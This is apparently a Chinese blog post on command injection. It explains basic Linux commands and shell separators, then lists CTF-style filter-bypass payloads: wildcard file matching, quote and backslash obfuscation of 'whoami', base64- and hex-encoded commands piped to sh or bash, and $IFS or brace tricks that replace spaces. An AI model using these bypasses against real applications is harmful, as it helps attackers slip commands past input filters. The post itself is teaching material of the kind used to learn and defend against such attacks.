命令执行&

本文详细介绍了Linux常用命令,如ls、cd、pwd等,并探讨了命令连接符的使用,包括管道、逻辑运算符等。此外,还讨论了如何通过通配符和特殊字符进行命令注入的绕过方法,如空格、百分比符号和注释的使用。对于信息安全专业人士来说,理解这些技巧对于防止和检测命令注入攻击至关重要。
摘要由CSDN通过智能技术生成

LINUX命令

- ls(英文全拼:list files): 列出目录及文件名

- cd(英文全拼:change directory):切换目录

  cd ..  表示去到目前的上一级目录,亦即是 /root 的上一级目录的意思

- pwd(英文全拼:print work directory):显示目前的目录

- mkdir(英文全拼:make directory):创建一个新的目录

- rmdir(英文全拼:remove directory):删除一个空的目录

- cp(英文全拼:copy file): 复制文件或目录

- rm(英文全拼:remove): 删除文件或目录

- mv(英文全拼:move file): 移动文件与目录,或修改文件与目录的名称

- vim 用编辑器打开

## 连接符

远程命令执行可以用到的命令连接符,windows系统和linux系统各有4个,其中3个是共有的,各有1个是特有的:

- windows系统:| 、||、&&、&
- linux系统:| 、||、&&、;

```
|
```

管道操作符

可以把前一个命令的标准输出传输到后一个命令的标准输入

a | b表示命令a的输出作为命令b的输入

在远程命令执行中,不管a的执行结果是否正确,b都可以执行

```
||
```

逻辑或

有短路的情况

比如 a || b,如果命令a执行成功,则命令b不会被执行;只有命令a执行失败的情况下,才会执行命令b

```
&&
```

逻辑与

注意该命令有短路的情况

比如 a && b,如果命令a执行失败,则命令b不会被执行;只有命令a执行成功的情况下,才会执行命令b

```
&
```

windows特有

允许在一行内从左向右顺序执行多条命令,前一条命令失败也不影响后一条命令的执行

比如 a & b,不管a是否执行成功,b命令都会执行

```
;
```

linux系统特有

允许在一行内从左向右顺序执行多条命令,前一条命令失败也不影响后一条命令的执行

比如 a ; b,不管a是否执行成功,b命令都会执行

## 绕过

### 只可绕过文件名(重点)

```
cat fl[abc]g.php                                 //匹配[abc]中的任何一个
cat f[a-z]ag.txt                                 //匹配a-z范围的任何字符
cat fla*                                         //用*匹配任意
a=f;d=ag;c=l;cat $a$c$d.php 表示cat flag.php       //内联执行
```

通配符匹配[a-z] 查询所有字母a-z里面的东西(正则的形式)

*匹配所有内容

? 单一字符匹配

### 绕过关键字

wh\o\ami    //反斜线绕过
who"a"mi    //双引号绕过
whoa'm'i    //单引号绕过
whoam``i    //反引号绕过
echo d2hvYW1p|base64 -d|sh  //base64绕过,其中d2hvYW1p是whoami的base64编码
echo d2hvYW1p|base64 -d|bash//base64绕过,其中d2hvYW1p是whoami的base64编码
`echo d2hvYW1p|base64 -d` //将其base64解码,然后用反引号来执行命令
echo 77686F616D69 | xxd -r -p | bash //hex绕过,其中77686F616D69是whoami的hex编码
//$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt    在没有传入参数的情况下,这些特殊字符默认为空,如下:
wh$1oami
who$@ami
whoa$*mi

### 空格绕过。

在命令执行里注入用%0a、注释符都可以,比较特殊的$IFS可以替换空格。

$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20
%09

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

会说ABC

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值